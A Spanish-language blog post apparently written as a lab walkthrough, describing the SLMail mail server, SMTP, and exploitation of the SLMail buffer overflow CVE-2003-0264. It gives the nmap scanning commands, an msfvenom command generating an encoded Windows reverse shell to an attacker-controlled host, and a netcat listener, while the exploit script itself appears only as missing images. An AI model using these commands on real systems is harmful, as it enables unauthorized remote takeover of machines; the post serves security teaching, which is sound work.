¿Qué es SLmail?

¿Qué es slmail?

El artículo que os comparto hoy no puede solo hablar de una vulnerabilidad bien conocida CVE-2003-0264, desbordamiento de código, sino que también es interesante ir más allá y conocer algo acerca de la historia sobre SLMail y SMTP.

Por Fernando Manrique

¿Qué es slmail?

SLMail es SMTP y POP3 software de servidor de correo para Microsoft™. Desarrollado por Seattle Lab es un servidor de correo electrónico para los sistemas operativos Microsoft Windows NT versión 4.0 y 2000. Podríamos describirlo como la “piedra angular para el desarrollo de una eficaz solución de correo electrónico”.

¿Qué es SLmail?

¿Qué es SMTP?

SMTP, abreviatura de Simple Mail Transfer Protocol, es el protocolo estándar para la transmisión de correo electrónico en la web. Es lo que los servidores de correo utilizan para enviar y recibir correos electrónicos en Internet.

Se estableció en 1982, lo que lo convierte en el puerto SMTP más antiguo. Se sigue conociendo como el puerto SMTP estándar y se utiliza principalmente para la retransmisión SMTP.

¿Qué es SMTP?

Vulnerabilidad: CVE-2003-0264

(https://www.cvedetails.com/cve/CVE-2003-0264/)

Fecha de publicación: 2003-05-27 Última fecha de actualización: 2021-02-24

¿Cómo explotarla?

Primero debemos ver que servicios están corriendo el estado y la versión, para ello utilizaremos nmap: sudo nmap -sV [IP]

Vulnerabilidad: CVE-2003-0264

Como podemos observar está levantados en este caso el puerto 25 con SLMAIL SMTP y el puerto 110 SLMAIL pop3d. Ahora que sabemos el estado y la versión de ambos, podemos tratar de averiguar las vulnerabilidades, haciendo uso del script vuln de nmap como se puede ver a continuación:

sudo nmap –script vuln [IP]

¿Qué es SLmail?

En la misma podemos ver que obtenemos el cve correspondiente a la vulnerabilidad sobre la cual podemos constatar que el sistema es vulnerable a la ejecución de código remoto, por medio de un desbordamiento durante la canonicalización de la ruta.

Siguientes pasos:

Buscaremos un exploit para la versión de SLMail detectada en exploit-db y generaremos la reverseShell a fin de poder tomar el control de la “máquina víctima”, para ello usaremos msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=[Ip atacante]LPORT=[puerto de escucha atacante] EXITFUNC=thread -a x86 –platform windows -b “\x00\x0a\x0d” -e x86/shikata_ga_nai -f python

Lo que nos dará la siguiente salida:

¿Qué es SLmail?

obteniendo los caracteres necesarios sin saltos de linea, necesarios para la generación del exploit en el cual tendremos que añadir en el lugar que indica la siguiente imagen. Este buf no es más que una cadena con un patrón único creado, el cual debemos incorporar al script de python.

¿Qué es SLmail?

una vez realizado, levantamos el puerto de escucha a través del siguiente comando:
sudo nc-nlvp [puerto de escucha]
y por último ejecutamos el script con python 2.7:

¿Qué es SLmail?

Una vez más  I Love to be Chamaleon 😉, orgulloso de ser “embajador” de Trentia.